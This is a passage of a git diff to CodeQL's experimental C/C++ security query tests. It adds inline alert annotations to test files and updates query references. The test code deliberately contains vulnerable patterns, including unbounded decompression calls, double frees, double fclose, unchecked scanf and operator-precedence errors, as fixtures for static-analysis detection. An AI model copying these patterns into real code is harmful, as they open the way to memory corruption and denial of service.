call to inflate | inflate | -| zlibTest.cpp:41:20:41:26 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:41:20:41:26 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:41:13:41:18 | call to gzread | gzread | -| zlibTest.cpp:51:38:51:44 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:51:38:51:44 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:51:14:51:20 | call to gzfread | gzfread | -| zlibTest.cpp:62:25:62:31 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:62:25:62:31 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:62:18:62:23 | call to gzgets | gzgets | -| zlibTest.cpp:77:45:77:59 | *input | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:77:45:77:59 | *input | The decompression output of $@ is not limited | zlibTest.cpp:77:5:77:14 | call to uncompress | uncompress | -| zstdTest.cpp:39:69:39:74 | & ... | main.cpp:7:33:7:36 | **argv | zstdTest.cpp:39:69:39:74 | & ... | The decompression output of $@ is not limited | zstdTest.cpp:39:32:39:52 | call to ZSTD_decompressStream | ZSTD_decompressStream | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.qlref index 3dcbc9db9ff4..b5c3a8e483da 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-409/DecompressionBombs.ql +query: experimental/Security/CWE/CWE-409/DecompressionBombs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/brotliTest.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/brotliTest.cpp index 902749434736..649373d326dc 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/brotliTest.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/brotliTest.cpp @@ -15,12 +15,12 @@ BrotliDecoderResult BrotliDecoderDecompressStream( void brotli_test(int argc, const char **argv) { uint8_t output[1024]; size_t output_size = sizeof(output); - BrotliDecoderDecompress(1024, (uint8_t *) argv[2], &output_size, output); // BAD + BrotliDecoderDecompress(1024, (uint8_t *) argv[2], &output_size, output); // BAD // $ Alert size_t input_size = 1024; const uint8_t *input_p = (const uint8_t*)argv[2]; uint8_t *output_p = output; size_t out_size; - BrotliDecoderDecompressStream(0, &input_size, &input_p, &output_size, // BAD + BrotliDecoderDecompressStream(0, &input_size, &input_p, &output_size, // BAD // $ Alert &output_p, &out_size); } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/libarchiveTests.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/libarchiveTests.cpp index 5988c9d0fc5e..9b8dfe194096 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/libarchiveTests.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/libarchiveTests.cpp @@ -19,7 +19,7 @@ static int read_data(archive *ar) { size_t size; la_int64_t offset; - int r = archive_read_data_block(ar, &buff, &size, &offset); // BAD + int r = archive_read_data_block(ar, &buff, &size, &offset); // BAD // $ Alert if (r == ARCHIVE_EOF) return ARCHIVE_OK; if (r < ARCHIVE_OK) diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/main.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/main.cpp index 47f76ff079ba..f890ba397a97 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/main.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/main.cpp @@ -4,7 +4,7 @@ void minizip_test(int argc, const char **argv); void zlib_test(int argc, const char **argv); void zstd_test(int argc, const char **argv); -int main(int argc, const char **argv) { +int main(int argc, const char **argv) { // $ Source brotli_test(argc, argv); libarchive_test(argc, argv); minizip_test(argc, argv); diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/minizipTest.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/minizipTest.cpp index 636f579feea7..b69eb27a3d78 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/minizipTest.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/minizipTest.cpp @@ -14,7 +14,7 @@ void minizip_test(int argc, const char **argv) { int32_t bytes_read; char buf[4096]; while(true) { - bytes_read = mz_zip_entry_read(zip_handle, (char *) argv[1], sizeof(buf)); // BAD + bytes_read = mz_zip_entry_read(zip_handle, (char *) argv[1], sizeof(buf)); // BAD // $ Alert if (bytes_read <= 0) { break; } @@ -23,7 +23,7 @@ void minizip_test(int argc, const char **argv) { void *zip_reader = mz_zip_reader_create(); mz_zip_reader_open_file(zip_reader, argv[1]); mz_zip_reader_goto_first_entry(zip_reader); - mz_zip_reader_entry_save(zip_reader, 0, 0); // BAD + mz_zip_reader_entry_save(zip_reader, 0, 0); // BAD // $ Alert - UnzOpen(argv[3]); // BAD + UnzOpen(argv[3]); // BAD // $ Alert } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zlibTest.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zlibTest.cpp index 7643a607407b..bb2df6e1d349 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zlibTest.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zlibTest.cpp @@ -22,7 +22,7 @@ void UnsafeInflate(char *input) { infstream.next_out = output; // output char array inflateInit(&infstream); - inflate(&infstream, 0); // BAD + inflate(&infstream, 0); // BAD // $ Alert } @@ -38,7 +38,7 @@ void UnsafeGzread(char *fileName) { gzFile inFileZ = gzopen(fileName, "rb"); unsigned char unzipBuffer[8192]; while (true) { - if (gzread(inFileZ, unzipBuffer, 8192) <= 0) { // BAD + if (gzread(inFileZ, unzipBuffer, 8192) <= 0) { // BAD // $ Alert break; } } @@ -48,7 +48,7 @@ void UnsafeGzfread(char *fileName) { gzFile inFileZ = gzopen(fileName, "rb"); while (true) { char buffer[1000]; - if (!gzfread(buffer, 999, 1, inFileZ)) { // BAD + if (!gzfread(buffer, 999, 1, inFileZ)) { // BAD // $ Alert break; } } @@ -59,7 +59,7 @@ void UnsafeGzgets(char *fileName) { char *buffer = new char[4000000000]; char *result; while (true) { - result = gzgets(inFileZ, buffer, 1000000000); // BAD + result = gzgets(inFileZ, buffer, 1000000000); // BAD // $ Alert if (result == nullptr) { break; } @@ -74,7 +74,7 @@ void InflateString(char *input) { uLong source_length = 500; uLong destination_length = sizeof(output); - uncompress(output, &destination_length, (Bytef *) input, source_length); // BAD + uncompress(output, &destination_length, (Bytef *) input, source_length); // BAD // $ Alert } void zlib_test(int argc, char **argv) { diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zstdTest.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zstdTest.cpp index 42455185823c..8fa15ee39b6f 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zstdTest.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zstdTest.cpp @@ -36,7 +36,7 @@ void zstd_test(int argc, const char **argv) { ZSTD_inBuffer input = {buffIn, read, 0}; while (input.pos < input.size) { ZSTD_outBuffer output = {buffOut, buffOutSize, 0}; - size_t const ret = ZSTD_decompressStream(dctx, &output, &input); // BAD + size_t const ret = ZSTD_decompressStream(dctx, &output, &input); // BAD // $ Alert CHECK_ZSTD(ret); } } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/DoubleFree.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/DoubleFree.qlref index 242beb593f8a..c6f509403283 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/DoubleFree.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/DoubleFree.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-415/DoubleFree.ql +query: experimental/Security/CWE/CWE-415/DoubleFree.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/test.c index 1c154c03094c..85130e5971ea 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/test.c @@ -8,14 +8,14 @@ void workFunction_0(char *s) { char *buf; buf = (char *) malloc(intSize); free(buf); // GOOD - if(buf) free(buf); // BAD + if(buf) free(buf); // BAD // $ Alert } void workFunction_1(char *s) { int intSize = 10; char *buf; buf = (char *) malloc(intSize); free(buf); // GOOD - free(buf); // BAD + free(buf); // BAD // $ Alert } void workFunction_2(char *s) { int intSize = 10; @@ -54,7 +54,7 @@ void workFunction_5(char *s, int intFlag) { if(intFlag) { free(buf); // GOOD } - free(buf); // BAD + free(buf); // BAD // $ Alert } void workFunction_6(char *s, int intFlag) { int intSize = 10; @@ -75,7 +75,7 @@ void workFunction_7(char *s) { char *buf1; buf = (char *) malloc(intSize); buf1 = (char *) realloc(buf,intSize*4); - free(buf); // BAD + free(buf); // BAD // $ Alert } void workFunction_8(char *s) { int intSize = 10; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/DangerousUseOfExceptionBlocks.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/DangerousUseOfExceptionBlocks.qlref index c67adb8774be..5a285aaa56ca 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/DangerousUseOfExceptionBlocks.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/DangerousUseOfExceptionBlocks.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-476/DangerousUseOfExceptionBlocks.ql +query: experimental/Security/CWE/CWE-476/DangerousUseOfExceptionBlocks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/test.cpp index de0be1efff25..9d7478548fd2 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/test.cpp @@ -68,7 +68,7 @@ void funcWork1b() { } delete [] bufMyData; - } + } // $ Alert } void funcWork1() { @@ -97,7 +97,7 @@ void funcWork1() { } delete [] bufMyData; - } + } // $ Alert } void funcWork2() { @@ -125,7 +125,7 @@ void funcWork2() { } delete [] bufMyData; - } + } // $ Alert } void funcWork3() { int a; @@ -148,7 +148,7 @@ void funcWork3() { } delete [] bufMyData; - } + } // $ Alert } @@ -180,7 +180,7 @@ void funcWork4b() { catch (...) { delete valData; // BAD - } + } // $ Alert } void funcWork5() { int a; @@ -218,7 +218,7 @@ void funcWork5b() { catch (...) { delete valData; // BAD - } + } // $ Alert } void funcWork6() { int a; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/FindIncorrectlyUsedSwitch.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/FindIncorrectlyUsedSwitch.qlref index b16a5e484a60..aeadfbd0d1aa 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/FindIncorrectlyUsedSwitch.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/FindIncorrectlyUsedSwitch.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-561/FindIncorrectlyUsedSwitch.ql +query: experimental/Security/CWE/CWE-561/FindIncorrectlyUsedSwitch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/test.c index ede4b87d249e..ecb421991a4c 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/test.c @@ -25,7 +25,7 @@ void testFunction(char c1,int i1) case 9: break; dafault: - } + } // $ Alert switch(c1){ // BAD c1=c1*2; @@ -35,7 +35,7 @@ void testFunction(char c1,int i1) break; case 9: break; - } + } // $ Alert if((c1<6)&&(c1>0)) switch(c1){ // BAD @@ -47,7 +47,7 @@ void testFunction(char c1,int i1) break; case 1: break; - } + } // $ Alert if((c1<6)&&(c1>0)) switch(c1){ // BAD @@ -55,6 +55,6 @@ void testFunction(char c1,int i1) break; case 1: break; - } + } // $ Alert } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/DangerousUseSSL_shutdown.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/DangerousUseSSL_shutdown.qlref index 0c2096f68ff8..ee351aa3cfb9 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/DangerousUseSSL_shutdown.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/DangerousUseSSL_shutdown.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-670/DangerousUseSSL_shutdown.ql +query: experimental/Security/CWE/CWE-670/DangerousUseSSL_shutdown.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/test.cpp index 9ebe1cc10a53..ce550684d087 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/test.cpp @@ -42,7 +42,7 @@ int gootTest2(SSL *ssl) int badTest1(SSL *ssl) { int ret; - switch ((ret = SSL_shutdown(ssl))) { + switch ((ret = SSL_shutdown(ssl))) { // $ Alert case 1: break; case 0: @@ -58,7 +58,7 @@ int badTest1(SSL *ssl) int badTest2(SSL *ssl) { int ret; - ret = SSL_shutdown(ssl); + ret = SSL_shutdown(ssl); // $ Alert switch (ret) { case 1: break; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/DoubleRelease.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/DoubleRelease.qlref index 3edd226abaa9..7d28602c7e9f 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/DoubleRelease.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/DoubleRelease.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-675/DoubleRelease.ql \ No newline at end of file +query: experimental/Security/CWE/CWE-675/DoubleRelease.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/test.cpp index 986a95b1ce96..143572b34c28 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/test.cpp @@ -17,7 +17,7 @@ void test2() FILE *f; f = fopen("myFile.txt", "wt"); - fclose(f); // BAD + fclose(f); // BAD // $ Alert fclose(f); } @@ -28,14 +28,14 @@ void test3() f = fopen("myFile.txt", "wt"); g = f; - fclose(f); // BAD + fclose(f); // BAD // $ Alert fclose(g); } int fGtest4_1() { fe = fopen("myFile.txt", "wt"); - fclose(fe); // BAD + fclose(fe); // BAD // $ Alert return -1; } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementAfterRefactoringTheCode.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementAfterRefactoringTheCode.qlref index 496d5f1b7be6..50143aaec229 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementAfterRefactoringTheCode.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementAfterRefactoringTheCode.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementAfterRefactoringTheCode.ql +query: experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementAfterRefactoringTheCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementWhenUsingBitOperations.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementWhenUsingBitOperations.qlref index 9bf28db3c8a8..2e5848da6d23 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementWhenUsingBitOperations.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementWhenUsingBitOperations.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementWhenUsingBitOperations.ql +query: experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementWhenUsingBitOperations.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/test.c index 1f41f499dede..58c687d53005 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/test.c @@ -5,25 +5,25 @@ void workFunction_0(char *s) { int intSize; char buf[80]; if(intSize>0 && intSize<80 && memset(buf,0,intSize)) return; // GOOD - if(intSize>0 & intSize<80 & memset(buf,0,intSize)) return; // BAD + if(intSize>0 & intSize<80 & memset(buf,0,intSize)) return; // BAD // $ Alert[cpp/errors-when-using-bit-operations] if(intSize>0 && tmpFunction()) return; - if(intSize<0 & tmpFunction()) return; // BAD + if(intSize<0 & tmpFunction()) return; // BAD // $ Alert[cpp/errors-when-using-bit-operations] } void workFunction_1(char *s) { int intA,intB; - if(intA + intB) return; // BAD + if(intA + intB) return; // BAD // $ Alert[cpp/errors-after-refactoring] if(intA + intB>4) return; // GOOD - if(intA>0 && (intA + intB)) return; // BAD + if(intA>0 && (intA + intB)) return; // BAD // $ Alert[cpp/errors-after-refactoring] while(intA>0) { if(intB - intA<10) break; intA--; - }while(intA>0); // BAD + }while(intA>0); // BAD // $ Alert[cpp/errors-after-refactoring] for(intA=100; intA>0; intA--) { if(intB - intA<10) break; - }while(intA>0); // BAD + }while(intA>0); // BAD // $ Alert[cpp/errors-after-refactoring] while(intA>0) { if(intB - intA<10) break; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/FindIncorrectlyUsedExceptions.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/FindIncorrectlyUsedExceptions.qlref index 85ac9ad2fd43..5dbfe0957a7b 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/FindIncorrectlyUsedExceptions.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/FindIncorrectlyUsedExceptions.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-703/FindIncorrectlyUsedExceptions.ql +query: experimental/Security/CWE/CWE-703/FindIncorrectlyUsedExceptions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/test.cpp index f255aabbb422..303728e97317 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/test.cpp @@ -32,13 +32,13 @@ void funcTest2() void funcTest3() { - std::runtime_error("msg error"); // BAD + std::runtime_error("msg error"); // BAD // $ Alert throw std::runtime_error("msg error"); // GOOD } void TestFunc() { - funcTest1(); - DllMain(); + funcTest1(); // $ Alert + DllMain(); // $ Alert funcTest2(); } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/ImproperCheckReturnValueScanf.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/ImproperCheckReturnValueScanf.qlref index f0cb9dd57c1e..1bc37310f275 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/ImproperCheckReturnValueScanf.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/ImproperCheckReturnValueScanf.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-754/ImproperCheckReturnValueScanf.ql +query: experimental/Security/CWE/CWE-754/ImproperCheckReturnValueScanf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/test.cpp index b9608b757b9c..749dc9bdc676 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/test.cpp @@ -49,9 +49,9 @@ int functionWork1b(int retIndex) { char a[10]; int b; int *p = &b; - scanf("%i", &i); // BAD - scanf("%s", a); // BAD - scanf("%i", p); // BAD + scanf("%i", &i); // BAD // $ Alert + scanf("%s", a); // BAD // $ Alert + scanf("%i", p); // BAD // $ Alert if(retIndex == 0) return (int)*a; if(retIndex == 1) @@ -102,9 +102,9 @@ int functionWork2b() { char a[10]; int b; int *p = &b; - scanf("%i", &i); // BAD - scanf("%s", a); // BAD - scanf("%i", p); // BAD + scanf("%i", &i); // BAD // $ Alert + scanf("%s", a); // BAD // $ Alert + scanf("%i", p); // BAD // $ Alert globalVal = i; globalVala = a; globalValp = p; @@ -112,12 +112,12 @@ int functionWork2b() { } int functionWork2b_() { char a[10]; - scanf("%s", a); // BAD + scanf("%s", a); // BAD // $ Alert globalVala2 = a[0]; return 0; } int functionWork3b(int * i) { - scanf("%i", i); // BAD + scanf("%i", i); // BAD // $ Alert return 0; } int functionWork3() { diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/UndefinedOrImplementationDefinedBehavior.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/UndefinedOrImplementationDefinedBehavior.qlref index e178bc348e9b..933f46a7abff 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/UndefinedOrImplementationDefinedBehavior.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/UndefinedOrImplementationDefinedBehavior.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-758/UndefinedOrImplementationDefinedBehavior.ql +query: experimental/Security/CWE/CWE-758/UndefinedOrImplementationDefinedBehavior.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/test.c index 01d8e666cdd8..f05eed27629a 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/test.c @@ -10,10 +10,10 @@ char tmpFunction2(char * buf) } void workFunction_0(char *s, char * buf) { int intA; - intA = tmpFunction1(buf) + tmpFunction2(buf); // BAD + intA = tmpFunction1(buf) + tmpFunction2(buf); // BAD // $ Alert intA = tmpFunction1(buf); //GOOD intA += tmpFunction2(buf); // GOOD - buf[intA] = intA++; // BAD + buf[intA] = intA++; // BAD // $ Alert intA++; buf[intA] = intA; // GOOD } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.qlref index 0c3f1c1c6a67..e2b7ace55b93 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.ql +query: experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/test.cpp index 479a4e5d6a3a..834ea2719213 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/test.cpp @@ -1,14 +1,14 @@ void testFunction(int i1, int i2, int i3, bool b1, bool b2, bool b3, char c1) { - if(b1||b2&&b3) //BAD + if(b1||b2&&b3) //BAD // $ Alert return; if((b1||b2)&&b3) //GOOD return; if(b1||(b2&&b3)) //GOOD return; - if(b1||b2&i1) //BAD + if(b1||b2&i1) //BAD // $ Alert return; if((b1||b2)&i1) //GOOD return; @@ -16,26 +16,26 @@ void testFunction(int i1, int i2, int i3, bool b1, bool b2, bool b3, char c1) return; if(b1&&b2&0) //GOOD return; - if(b1||b2|i1) //BAD + if(b1||b2|i1) //BAD // $ Alert return; if((b1||b2)|i1) //GOOD return; - if(i1|i2&c1) //BAD + if(i1|i2&c1) //BAD // $ Alert return; if((i1|i2)&i3) //GOOD return; - if(i1^i2&c1) //BAD + if(i1^i2&c1) //BAD // $ Alert return; if((i1^i2)&i3) //GOOD return; - if(i1|i2^c1) //BAD + if(i1|i2^c1) //BAD // $ Alert return; if((i1|i2)^i3) //GOOD return; - if(b1|b2^b3) //BAD + if(b1|b2^b3) //BAD // $ Alert return; if((b1|b2)^b3) //GOOD return; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.qlref index 6ba005d087a6..c3aaa7d65a08 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-788/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.ql +query: experimental/Security/CWE/CWE-788/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBoolType.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBoolType.qlref index 5189abcce5d1..47c4540803df 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBoolType.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBoolType.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBoolType.ql +query: 